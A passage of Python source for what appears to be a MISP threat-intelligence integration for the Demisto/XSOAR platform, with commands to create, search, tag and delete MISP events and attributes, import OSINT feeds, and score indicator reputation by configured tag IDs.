event.published = argToBoolean(args.get('published', 'False'))
return event
def create_event_command(demisto_args: dict):
"""Creating event in MISP with the given attribute args"""
new_event = get_new_misp_event_object(demisto_args)
new_event = PYMISP.add_event(new_event, True)
if isinstance(new_event, dict) and new_event.get('errors'):
raise DemistoException(new_event.get('errors'))
event_id = new_event.id
add_attribute(event_id=event_id, internal=True, new_event=new_event, demisto_args=demisto_args)
event = PYMISP.search(eventid=event_id)
human_readable = f"## MISP create event\nNew event with ID: {event_id} has been successfully created.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(event),
raw_response=event
)
def add_attribute(event_id: int = None, internal: bool = False, demisto_args: dict = {}, new_event: MISPEvent = None):
"""Adding attribute to a given MISP event object
This function can be called as an independence command or as part of another command (create event for example)
Args:
event_id (int): Event ID to add attribute to
internal (bool): if set to True, will not post results to Demisto
demisto_args (dict): Demisto args
new_event (MISPEvent): When this function was called from create event command, the attrubite will be added to
that existing event.
"""
attributes_args = {
'id': demisto_args.get('event_id'), # misp event id
'type': demisto_args.get('type', 'other'),
'category': demisto_args.get('category', 'External analysis'),
'to_ids': argToBoolean(demisto_args.get('to_ids', True)),
'comment': demisto_args.get('comment'),
'value': demisto_args.get('value')
}
event_id = event_id if event_id else arg_to_number(demisto_args.get('event_id'), "event_id")
attributes_args.update({'id': event_id}) if event_id else None
distribution = demisto_args.get('distribution')
attributes_args.update({'distribution': MISP_DISTRIBUTION_TO_IDS[distribution]}) if distribution else None
if not new_event:
response = PYMISP.search(eventid=event_id, pythonify=True)
if not response:
raise DemistoException(
f"Error: An event with the given id: {event_id} was not found in MISP. please check it once again")
new_event = response[0] # response[0] is MISP event
new_event.add_attribute(**attributes_args)
PYMISP.update_event(event=new_event)
if internal:
return
value = attributes_args.get('value')
updated_event = PYMISP.search(eventid=new_event.id, controller='attributes', value=value)
human_readable = f"## MISP add attribute\nNew attribute: {value} was added to event id {new_event.id}.\n"
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(updated_event),
raw_response=updated_event
)
def generic_reputation_command(demisto_args, reputation_type, dbot_type, malicious_tag_ids, suspicious_tag_ids,
reliability, attributes_limit):
reputation_value_list = argToList(demisto_args.get(reputation_type), ',')
command_results = []
for value in reputation_value_list:
command_results.append(
get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability,
attributes_limit))
return command_results
def reputation_value_validation(value, dbot_type):
if dbot_type == 'FILE':
# hashFormat will be used only in output
hash_format = get_hash_type(value)
if hash_format == 'Unknown':
raise DemistoException('Invalid hash length, enter file hash of format MD5, SHA-1 or SHA-256')
if dbot_type == 'IP':
if not is_ip_valid(value):
raise DemistoException(f"Error: The given IP address: {value} is not valid")
if dbot_type == 'DOMAIN':
if not re.compile(DOMAIN_REGEX, regexFlags).match(value):
raise DemistoException(f"Error: The given domain: {value} is not valid")
if dbot_type == 'URL':
if not re.compile(urlRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given url: {value} is not valid")
if dbot_type == 'EMAIL':
if not re.compile(emailRegex, regexFlags).match(value):
raise DemistoException(f"Error: The given email address: {value} is not valid")
def get_indicator_results(value, dbot_type, malicious_tag_ids, suspicious_tag_ids, reliability, attributes_limit):
"""
This function searches for the given attribute value in MISP and then calculates it's dbot score.
The score is calculated by the tags ids (attribute tags and event tags).
Args:
value (str): The indicator value (an IP address, email address, domain, url or file hash).
dbot_type (str): Indicator type (file, url, domain, email or ip).
malicious_tag_ids (set): Tag ids should be recognised as malicious.
suspicious_tag_ids (set): Tag ids should be recognised as suspicious
reliability (DBotScoreReliability): integration reliability score.
attributes_limit (int) : Limits the number of attributes that will be written to the context
Returns:
CommandResults includes all the indicator results.
"""
reputation_value_validation(value, dbot_type)
misp_response = PYMISP.search(value=value, controller='attributes', include_context=True,
include_correlations=True, include_event_tags=True, enforce_warninglist=True,
include_decay_score=True, includeSightings=True)
indicator_type = INDICATOR_TYPE_TO_DBOT_SCORE[dbot_type]
is_indicator_found = misp_response and misp_response.get('Attribute')
if is_indicator_found:
outputs, score, found_tag, found_related_events = parse_response_reputation_command(misp_response,
malicious_tag_ids,
suspicious_tag_ids,
attributes_limit)
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=score, reliability=reliability, malicious_description="Match found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
all_attributes = outputs.get('Attribute')
events_to_human_readable = get_events_related_to_scored_tag(all_attributes, found_tag)
attribute_highlights = reputation_command_to_human_readable(all_attributes, score, events_to_human_readable)
readable_output = tableToMarkdown(f'Results found in MISP for value: {value}', attribute_highlights,
removeNull=True)
readable_output += tableToMarkdown('Related events', list(found_related_events.values()))
return CommandResults(indicator=indicator,
raw_response=misp_response,
outputs=all_attributes,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
readable_output=readable_output)
else:
dbot = Common.DBotScore(indicator=value, indicator_type=indicator_type,
score=Common.DBotScore.NONE, reliability=reliability,
malicious_description="No results were found in MISP")
indicator = get_dbot_indicator(dbot_type, dbot, value)
return CommandResults(indicator=indicator,
readable_output=f"No attributes found in MISP for value: {value}")
def get_events_related_to_scored_tag(all_attributes, found_tag):
"""
This function searches for all the events that have the tag (i.e found_tag) which caused the indicator to be scored
as malicious or suspicious.
Args:
all_attributes (dict): The parsed response from the MISP search attribute request
found_tag (str): The tag that was scored as malicious or suspicious. If no tag was found, then the score is
Unknown so no events should be found.
Returns:
list includes all the events that were detected as related to the tag.
"""
scored_events = []
if found_tag:
for attribute in all_attributes:
event = attribute.get('Event', {})
event_name = event.get('Info')
scored_events.extend(search_events_with_scored_tag(event, found_tag, event_name))
scored_events.extend(search_events_with_scored_tag(attribute, found_tag, event_name))
return remove_duplicated_related_events(scored_events)
def remove_duplicated_related_events(related_events):
related_events_no_duplicates = []
for i in range(len(related_events)):
if related_events[i] not in related_events[i + 1:]:
related_events_no_duplicates.append(related_events[i])
return related_events_no_duplicates
def search_events_with_scored_tag(object_data_dict, found_tag, event_name):
"""
By the given object we go over all the tags and search if found_tag is one of it's tags. If so, the event will be
added to related_events list
Args:
object_data_dict (dict): Event or attribute dict which includes tags list.
found_tag (str): The tag that was scored as malicious or suspicious.
event_name (str): Name of the event
"""
related_events = []
object_tags_list = object_data_dict.get('Tag', [])
for tag in object_tags_list:
if tag.get('ID') == found_tag:
event_id = get_event_id(object_data_dict)
tag_name = tag.get('Name')
related_events.append({'Event_ID': event_id, 'Event_Name': event_name,
'Tag_Name': tag_name, 'Tag_ID': tag.get('ID')})
return related_events
def get_event_id(data_dict):
if data_dict.get('EventID'):
return data_dict.get('EventID')
elif data_dict.get('ID'):
return data_dict.get('ID')
return data_dict.get('Event', {}).get('ID')
def get_dbot_indicator(dbot_type, dbot_score, value):
if dbot_type == "FILE":
hash_type = get_hash_type(value)
if hash_type == 'md5':
return Common.File(dbot_score=dbot_score, md5=value)
if hash_type == 'sha1':
return Common.File(dbot_score=dbot_score, sha1=value)
if hash_type == 'sha256':
return Common.File(dbot_score=dbot_score, sha256=value)
if dbot_type == "IP":
return Common.IP(ip=value, dbot_score=dbot_score)
if dbot_type == "DOMAIN":
return Common.Domain(domain=value, dbot_score=dbot_score)
if dbot_type == "EMAIL":
return Common.EMAIL(address=value, dbot_score=dbot_score)
if dbot_type == "URL":
return Common.URL(url=value, dbot_score=dbot_score)
def build_misp_complex_filter(demisto_query: str):
"""
Examples are available in UT: test_build_misp_complex_filter.
For more information please see build_complex_query in pymisp/api.py
Args:
demisto_query: complex query contains saved words: 'AND:', 'OR:' and 'NOT:'
using ',' as delimiter for parameters and ';' as delimiter for operators.
using the operators is optional.
if 'demisto_query' does not contains any of the complex operators the original
input will be returned
Returns:
str: dictionary created for misp to perform complex query
or if no complex query found returns the original input
"""
regex_and = r'(AND:)([^\;]+)(;)?'
regex_or = r'(OR:)([^\;]+)(;)?'
regex_not = r'(NOT:)([^\;]+)(;)?'
misp_query_params = dict()
match_and = re.search(regex_and, demisto_query, re.MULTILINE)
match_or = re.search(regex_or, demisto_query, re.MULTILINE)
match_not = re.search(regex_not, demisto_query, re.MULTILINE)
is_complex_and_operator = is_misp_complex_search_helper(match_and, misp_query_params, 'and_parameters')
is_complex_or_operator = is_misp_complex_search_helper(match_or, misp_query_params, 'or_parameters')
is_complex_not_operator = is_misp_complex_search_helper(match_not, misp_query_params, 'not_parameters')
is_complex_search = is_complex_and_operator or is_complex_or_operator or is_complex_not_operator
if is_complex_search:
return PYMISP.build_complex_query(**misp_query_params)
return demisto_query
def is_misp_complex_search_helper(match_operator, misp_query_params, operator_key):
is_complex_search = False
if match_operator is not None:
misp_query_params[operator_key] = match_operator.group(2).split(',')
is_complex_search = True
return is_complex_search
def prepare_args_to_search(controller):
demisto_args = demisto.args()
args_to_misp_format = {arg: demisto_args[arg] for arg in MISP_SEARCH_ARGUMENTS if arg in demisto_args}
# Replacing keys and values from Demisto to Misp's keys
if 'type' in args_to_misp_format:
args_to_misp_format['type_attribute'] = args_to_misp_format.pop('type')
if 'to_ids' in args_to_misp_format:
args_to_misp_format['to_ids'] = 1 if demisto_args.get('to_ids') == 'true' else 0
if 'from' in args_to_misp_format:
args_to_misp_format['date_from'] = args_to_misp_format.pop('from')
if 'to' in args_to_misp_format:
args_to_misp_format['date_to'] = args_to_misp_format.pop('to')
if 'event_id' in args_to_misp_format:
args_to_misp_format['eventid'] = argToList(args_to_misp_format.pop('event_id'))
if 'last' in args_to_misp_format:
args_to_misp_format['publish_timestamp'] = args_to_misp_format.pop('last')
if 'include_decay_score' in args_to_misp_format:
args_to_misp_format['include_decay_score'] = 1 if demisto_args.get('include_decay_score') == 'true' else 0
if 'include_sightings' in args_to_misp_format:
args_to_misp_format['include_sightings'] = 1 if demisto_args.get('include_sightings') == 'true' else 0
if 'include_correlations' in args_to_misp_format:
args_to_misp_format['include_correlations'] = 1 if demisto_args.get('include_correlations') == 'true' else 0
if 'enforceWarninglist' in args_to_misp_format:
args_to_misp_format['enforceWarninglist'] = 1 if demisto_args.get('enforceWarninglist') == 'true' else 0
if 'include_feed_correlations' in args_to_misp_format:
args_to_misp_format['includeFeedCorrelations'] = 1 if demisto_args.get(
'include_feed_correlations') == 'true' else 0
args_to_misp_format.pop('include_feed_correlations')
if 'limit' not in args_to_misp_format:
args_to_misp_format['limit'] = '50'
if 'tags' in args_to_misp_format:
args_to_misp_format['tags'] = build_misp_complex_filter(args_to_misp_format['tags'])
args_to_misp_format['controller'] = controller
demisto.debug(f"[MISP V3]: args for {demisto.command()} command are {args_to_misp_format}")
return args_to_misp_format
def build_attributes_search_response(response: Union[dict, requests.Response],
include_correlations=False) -> dict:
"""
Convert the response of attribute search returned from MISP to the context output format.
"""
response_object = copy.deepcopy(response)
if include_correlations:
# return full related attributes only if the user wants to get them back
ATTRIBUTE_FIELDS.append('RelatedAttribute')
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return get_limit_attribute_search_outputs(attributes)
def get_limit_attribute_search_outputs(attributes):
for i in range(len(attributes)):
attributes[i] = {key: attributes[i].get(key) for key in ATTRIBUTE_FIELDS if key in attributes[i]}
build_galaxy_output(attributes[i])
build_tag_output(attributes[i])
build_sighting_output_from_attribute_search_response(attributes[i])
convert_timestamp_to_readable(attributes[i], None)
formatted_attributes = replace_keys_from_misp_to_context_data(attributes)
return formatted_attributes
def build_galaxy_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Galaxy'):
given_object['Galaxy'] = [
{
'name': star.get('name'),
'type': star.get('type'),
'description': star.get('description')
} for star in given_object['Galaxy']
]
def build_object_output(event):
if event.get('Object'):
event['Object'] = [
{
'name': event_object.get('name'),
'uuid': event_object.get('uuid'),
'description': event_object.get('description'),
'id': event_object.get('id')
} for event_object in event['Object']
]
def build_tag_output(given_object):
"""given_object is attribute or event, depends on the called function"""
if given_object.get('Tag'):
given_object['Tag'] = [
{'Name': tag.get('name'),
'is_galaxy': tag.get('is_galaxy')
} for tag in given_object.get('Tag')
]
def build_sighting_output_from_attribute_search_response(attribute):
if attribute.get('Sighting'):
attribute['Sighting'] = [
{'type': sighting.get('type')
} for sighting in attribute.get('Sighting')
]
def build_attributes_search_response_return_only_values(response_object: Union[dict, requests.Response]) -> list:
"""returns list of attributes' values that match the search query when user set the arg 'compact' to True"""
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
attributes = response_object.get('Attribute')
return [attribute.get('value') for attribute in attributes]
def pagination_args_validation(page, limit):
if page and page < 0:
raise DemistoException("page should be zero or a positive number")
if limit and limit < 0:
raise DemistoException("limit should be zero or a positive number")
def attribute_response_to_markdown_table(response: dict):
attribute_highlights = []
for attribute in response:
event = attribute.get('Event', {})
attribute_tags = [tag.get('Name') for tag in attribute.get('Tag')] if attribute.get(
'Tag') else None
attribute_sightings = [SIGHTING_TYPE_ID_TO_NAME[sighting.get('Type')] for sighting in
attribute.get('Sighting')] if attribute.get('Sighting') else None
attribute_highlights.append({
'Attribute ID': attribute.get('ID'),
'Event ID': attribute.get('EventID'),
'Attribute Category': attribute.get('Category'),
'Attribute Type': attribute.get('Type'),
'Attribute Comment': attribute.get('Comment'),
'Attribute Value': attribute.get('Value'),
'Attribute Tags': attribute_tags,
'Attribute Sightings': attribute_sightings,
'To IDs': attribute.get('ToIDs'),
'Timestamp': attribute.get('Timestamp'),
'Event Info': event.get('Info'),
'Event Organization ID': event.get('OrganizationID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID')
})
return attribute_highlights
def search_attributes(demisto_args: dict) -> CommandResults:
"""Execute a MISP search over 'attributes'"""
args = prepare_args_to_search('attributes')
outputs_should_include_only_values = argToBoolean(demisto_args.get('compact', False))
include_correlations = argToBoolean(demisto_args.get('include_correlations', False))
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
if outputs_should_include_only_values:
response_for_context = build_attributes_search_response_return_only_values(response)
number_of_results = len(response_for_context)
md = tableToMarkdown(f"MISP search-attributes returned {number_of_results} attributes",
response_for_context[:number_of_results], ["Value"])
else:
response_for_context = build_attributes_search_response(response, include_correlations)
attribute_highlights = attribute_response_to_markdown_table(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-attributes returned {len(response_for_context)} attributes\n {pagination_message}",
attribute_highlights, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Attribute",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No attributes found in MISP for the given filters: {args}")
def build_events_search_response(response: Union[dict, requests.Response]) -> dict:
"""
Convert the response of event search returned from MISP to the context output format.
please note: attributes are excluded from search-events output as the information is too big. User can use the
command search-attributes in order to get the information about the attributes.
"""
response_object = copy.deepcopy(response)
if isinstance(response_object, str):
response_object = json.loads(json.dumps(response_object))
events = [event.get('Event') for event in response_object]
for i in range(0, len(events)):
# Filter object from keys in event_args
events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}
events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event
build_galaxy_output(events[i])
build_tag_output(events[i])
build_object_output(events[i])
events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))
events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))
formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore
return formatted_events # type: ignore
def event_to_human_readable_tag_list(event):
event_tags = event.get('Tag', [])
if event_tags:
return [tag.get('Name') for tag in event_tags]
def event_to_human_readable_galaxy_list(event):
event_galaxies = event.get('Galaxy', [])
if event_galaxies:
return [galaxy.get('Name') for galaxy in event.get('Galaxy')]
def event_to_human_readable_object_list(event):
event_objects = event.get('Object', [])
if event_objects:
return [event_object.get('ID') for event_object in event.get('Object')]
def event_to_human_readable(response: dict):
event_highlights = []
for event in response:
event_tags = event_to_human_readable_tag_list(event)
event_galaxies = event_to_human_readable_galaxy_list(event)
event_objects = event_to_human_readable_object_list(event)
event_highlights.append({
'Event ID': event.get('ID'),
'Event Tags': event_tags,
'Event Galaxies': event_galaxies,
'Event Objects': event_objects,
'Publish Timestamp': event.get('PublishTimestamp'),
'Event Info': event.get('Info'),
'Event Org ID': event.get('OrganizationID'),
'Event Orgc ID': event.get('OwnerOrganization.ID'),
'Event Distribution': event.get('Distribution'),
'Event UUID': event.get('UUID'),
})
return event_highlights
def search_events(demisto_args: dict) -> CommandResults:
"""
Execute a MISP search using the 'event' controller.
"""
args = prepare_args_to_search('events')
page = arg_to_number(demisto_args.get('page', 1), "page", required=True)
limit = arg_to_number(demisto_args.get('limit', 50), "limit", required=True)
pagination_args_validation(page, limit)
response = PYMISP.search(**args)
if response:
response_for_context = build_events_search_response(response)
event_outputs_to_human_readable = event_to_human_readable(response_for_context)
pagination_message = f"Current page size: {limit}\n"
if len(response_for_context) == limit:
pagination_message += f"Showing page {page} out others that may exist"
else:
pagination_message += f"Showing page {page}"
md = tableToMarkdown(
f"MISP search-events returned {len(response_for_context)} events.\n {pagination_message}",
event_outputs_to_human_readable, removeNull=True)
return CommandResults(
raw_response=response,
readable_output=md,
outputs=response_for_context,
outputs_prefix="MISP.Event",
outputs_key_field="ID"
)
else:
return CommandResults(readable_output=f"No events found in MISP for the given filters: {args}")
def delete_event(demisto_args: dict):
"""
Gets an event id and deletes it.
"""
event_id = demisto_args.get('event_id')
response = PYMISP.delete_event(event_id)
if 'errors' in response:
raise DemistoException(f'Event ID: {event_id} has not found in MISP: \nError message: {response}')
else:
human_readable = f'Event {event_id} has been deleted'
return CommandResults(readable_output=human_readable, raw_response=response)
def add_tag(demisto_args: dict, is_attribute=False):
"""
Function will add tag to given UUID of event or attribute.
is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False).
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
PYMISP.tag(uuid, tag) # add the tag
except PyMISPError:
raise DemistoException("Adding the required tag was failed. Please make sure the UUID exists.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully added to event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def remove_tag(demisto_args: dict, is_attribute=False):
"""
Function will remove tag to given UUID of event or attribute.
is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's.
"""
uuid = demisto_args.get('uuid')
tag = demisto_args.get('tag')
try:
response = PYMISP.untag(uuid, tag)
if response and response.get('errors'):
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
except PyMISPError:
raise DemistoException("Removing the required tag was failed. Please make sure the UUID and tag exist.")
if is_attribute:
response = PYMISP.search(uuid=uuid, controller='attributes')
human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=build_attributes_search_response(response),
raw_response=response
)
# event's uuid
response = PYMISP.search(uuid=uuid)
human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=build_events_search_response(response),
raw_response=response
)
def add_sighting(demisto_args: dict):
"""Adds sighting to MISP attribute
"""
attribute_id = demisto_args.get('id')
attribute_uuid = demisto_args.get('uuid')
sighting_type = demisto_args['type'] # mandatory arg
att_id = attribute_id or attribute_uuid
if not att_id:
raise DemistoException('ID or UUID not specified')
sighting_args = {
'id': attribute_id,
'uuid': attribute_uuid,
'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]
}
sigh_obj = MISPSighting()
sigh_obj.from_dict(**sighting_args)
response = PYMISP.add_sighting(sigh_obj, att_id)
if response.get('message'):
raise DemistoException(f"An error was occurred: {response.get('message')}")
elif response.get('Sighting'):
human_readable = f'Sighting \'{sighting_type}\' has been successfully added to attribute {att_id}'
return CommandResults(readable_output=human_readable)
raise DemistoException(f"An error was occurred: {json.dumps(response)}")
def test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):
"""
Test module.
"""
is_tag_list_valid(malicious_tag_ids)
is_tag_list_valid(suspicious_tag_ids)
if attributes_limit < 0:
raise DemistoException('Attribute limit has to be a positive number.')
response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')
if PYMISP._check_json_response(response):
return 'ok'
else:
raise DemistoException('MISP has not connected.')
def build_feed_url(demisto_args):
url = demisto_args.get('feed')
url = url[:-1] if url.endswith('/') else url
if PREDEFINED_FEEDS.get(url):
url = PREDEFINED_FEEDS[url].get('url') # type: ignore
return url
def add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):
"""Gets an OSINT feed from url and publishing them to MISP
urls with feeds for example: https://www.misp-project.org/feeds/
feed format must be MISP.
"""
headers = {'Accept': 'application/json'}
url = build_feed_url(demisto_args)
osint_url = f'{url}/manifest.json'
limit = arg_to_number(demisto_args.get('limit', 2), "limit", required=True)
try:
uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()
events_ids = list() # type: List[Dict[str, int]]
for index, uri in enumerate(uri_list, 1):
response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()
misp_new_event = MISPEvent()
misp_new_event.load(response)
add_event_response = PYMISP.add_event(misp_new_event)
event_object = add_event_response.get('Event')
if event_object and 'id' in event_object:
events_ids.append({'ID': event_object['id']})
if limit == len(events_ids):
break
human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', events_ids)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=events_ids,
)
except ValueError as e:
raise DemistoException(f'URL [{url}] is not a valid MISP feed. error: {e}')
def add_object(event_id: str, obj: MISPObject):
"""Sending object to MISP and returning outputs
Args:
obj: object to add to MISP
event_id: ID of event
"""
response = PYMISP.add_object(event_id, misp_object=obj)
if 'errors' in response:
raise DemistoException(f'Error in `{demisto.command()}` command: {response}')
for ref in obj.ObjectReference:
response = PYMISP.add_object_reference(ref)
for attribute in response.get('Object', {}).get('Attribute', []):
convert_timestamp_to_readable(attribute, None)
response['Object']['timestamp'] = misp_convert_timestamp_to_date_string(response.get('Object', {}).get('timestamp'))
formatted_response = replace_keys_from_misp_to_context_data(response)
formatted_response.update({"ID": event_id})
human_readable = f'Object has been added to MISP event ID {event_id}'
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Event',
outputs_key_field='ID',
outputs=formatted_response,
)
def add_file_object(demisto_args: dict):
entry_id = demisto_args.get('entry_id')
event_id = demisto_args.get('event_id')
file_path = demisto.getFilePath(entry_id).get('path')
obj = FileObject(file_path)
return add_object(event_id, obj)
def add_domain_object(demisto_args: dict):
"""Adds a domain object to MISP
domain-ip description: https://www.misp-project.org/objects.html#_domain_ip
"""
text = demisto_args.get('text')
event_id = demisto_args.get('event_id')
domain = demisto_args.get('name')
obj = MISPObject('domain-ip')
ips = argToList(demisto_args.get('ip'))
for ip in ips:
obj.add_attribute('ip', value=ip)
obj.add_attribute('domain', value=domain)
if text:
obj.add_attribute('text', value=text)
return add_object(event_id, obj)
def add_url_object(demisto_args: dict):
"""Building url object in MISP scheme
Scheme described https://www.misp-project.org/objects.html#_url
"""
url_args = [
'text',
'last_seen',
'first_seen'
]
event_id = demisto_args.get('event_id')
url = demisto_args.get('url')
url_parse = urlparse(url)
url_obj = [{'url': url}]
url_obj.extend({'scheme': url_parse.scheme}) if url_parse.scheme else None
url_obj.append({'resource_path': url_parse.path}) if url_parse.path else None
url_obj.append({'query_string': url_parse.query}) if url_parse.query else None
url_obj.append({'domain': url_parse.netloc}) if url_parse.netloc else None
url_obj.append({'fragment': url_parse.fragment}) if url_parse.fragment else None
url_obj.append({'port': url_parse.port}) if url_parse.port else None
url_obj.append(
{'credential': (url_parse.username, url_parse.password)}) if url_parse.username and url_parse.password else None
url_obj.extend(convert_arg_to_misp_args(demisto_args, url_args))
g_object = build_generic_object('url', url_obj)
return add_object(event_id, g_object)
def add_generic_object_command(demisto_args: dict):
event_id = demisto_args.get('event_id')
template = demisto_args.get('template')
attributes = demisto_args.get('attributes').replace("'", '"')
try:
args = json.loads(attributes)
if not isinstance(args, list):
args = dict_to_generic_object_format(args)
obj = build_generic_object(template, args)
return add_object(event_id, obj)
except ValueError as e:
raise DemistoException(
f'`attribute` parameter could not be decoded, may not a valid JSON\nattribute: {attributes}', str(e))
def convert_arg_to_misp_args(demisto_args, args_names):
return [{arg.replace('_', '-'): demisto_args.get(arg)} for arg in args_names if demisto_args.get(arg)]
def add_ip_object(demisto_args: dict):
event_id = demisto_args.get('event_id')
ip_object_args = [
'dst_port',
'src_port',
'domain',
'hostname',
'ip_src',
'ip_dst'
]
# converting args to MISP's arguments types
misp_attributes_args = convert_arg_to_misp_args(demisto_args, ip_object_args)
ips = argToList(demisto_args.get('ip'))
for ip in ips:
misp_attributes_args.append({'ip': ip})
if misp_attributes_args:
non_req_args = [
'first_seen',
'last_seen',
]
misp_attributes_args.extend(convert_arg_to_misp_args(demisto_args, non_req_args))
misp_attributes_args.append({'text': demisto_args.get('comment')}) if demisto_args.get('comment') else None
obj = build_generic_object('ip-port', misp_attributes_args)
return add_object(event_id, obj)
else:
raise DemistoException(
f'None of required arguments presents. command {demisto.command()} requires one of {ip_object_args}')
def handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids):
"""
Gets 2 sets which include tag ids. If there is an id that exists in both sets, it will be removed from the
suspicious tag ids set and will be stayed only in the malicious one (as a tag that was configured to be malicious is
stronger than recognised as suspicious).
"""
common_ids = set(malicious_tag_ids) & set(suspicious_tag_ids)
suspicious_tag_ids = {tag_id for tag_id in suspicious_tag_ids if tag_id not in common_ids}
return malicious_tag_ids, suspicious_tag_ids
def is_tag_list_valid(tag_ids):
"""Gets a list ot tag ids (each one is str), and verify all the tags are valid positive integers."""
for tag in tag_ids:
try:
tag = int(tag)
if tag <= 0:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
except ValueError:
raise DemistoException(f"Tag id has to be a positive integer, please change the given: '{tag}' id.")
def create_updated_attribute_instance(demisto_args: dict, attribute_uuid: str) -> MISPAttribute:
attribute_type = demisto_args.get('type')
distribution = demisto_args.get('distribution')
category = demisto_args.get('category')
comment = demisto_args.get('comment')
value = demisto_args.get('value')
first_seen = demisto_args.get('first_seen')
last_seen = demisto_args.get('last_seen')
attribute_instance = MISPAttribute()
attribute_instance.uuid = attribute_uuid
if attribute_type:
attribute_instance.type = attribute_type
if distribution:
attribute_instance.distribution = MISP_DISTRIBUTION_TO_IDS[distribution]
if category:
attribute_instance.category = category
if value:
attribute_instance.value = value
if comment:
attribute_instance.comment = comment
if first_seen:
attribute_instance.first_seen = first_seen
if last_seen:
attribute_instance.last_seen = last_seen
return attribute_instance
def update_attribute_command(demisto_args: dict) -> CommandResults:
attribute_uuid = demisto_args.get('attribute_uuid')
attribute_instance = create_updated_attribute_instance(demisto_args, attribute_uuid)
attribute_instance_response = PYMISP.update_attribute(attribute=attribute_instance, attribute_id=attribute_uuid)
if isinstance(attribute_instance_response, dict) and attribute_instance_response.get('errors'):
raise DemistoException(attribute_instance_response.get('errors'))
human_readable = f"## MISP update attribute\nAttribute: {attribute_uuid} was updated.\n"
attribute = attribute_instance_response.get('Attribute')
convert_timestamp_to_readable(attribute, None)
parsed_attribute_data = replace_keys_from_misp_to_context_data(attribute)
return CommandResults(
readable_output=human_readable,
outputs_prefix='MISP.Attribute',
outputs_key_field='ID',
outputs=parsed_attribute_data,
)
def main():
params = demisto.params()
malicious_tag_ids = argToList(params.get('malicious_tag_ids'))
suspicious_tag_ids = argToList(params.get('suspicious_tag_ids'))
reliability = params.get('integrationReliability', 'B - Usually reliable')
if DBotScoreReliability.is_valid_type(reliability):
reliability = DBotScoreReliability.get_dbot_score_reliability_from_str(reliability)
else:
Exception("MISP V3 error: Please provide a valid value for the Source Reliability parameter")
attributes_limit = arg_to_number(params.get('attributes_limit', 20), "attributes_limit", required=True)
command = demisto.command()
demisto.debug(f'[MISP V3]: command is {command}')
args = demisto.args()
try:
malicious_tag_ids, suspicious_tag_ids = handle_tag_duplication_ids(malicious_tag_ids, suspicious_tag_ids)
if command == 'test-module':
return_results(test(malicious_tag_ids=malicious_tag_ids, suspicious_tag_ids=suspicious_tag_ids,
attributes_limit=attributes_limit))
elif command == 'misp-create-event':
return_results(create_event_command(args))
elif command == 'misp-add-attribute':
return_results(add_attribute(demisto_args=args))
elif command == 'misp-search-events':
return_results(search_events(args))
elif command == 'misp-search-attributes':
return_results(search_attributes(args))
elif command == 'misp-delete-event':
return_results(delete_event(args))
elif command == 'misp-add-sighting':
return_results(add_sighting(args))
elif command == 'misp-add-tag-to-event':
return_results(add_tag(args))
elif command == 'misp-add-tag-to-attribute':
return_results(add_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-remove-tag-from-event':
return_results(remove_tag(args))
elif command == 'misp-remove-tag-from-attribute':
return_results(remove_tag(demisto_args=args, is_attribute=True))
elif command == 'misp-add-events-from-feed':
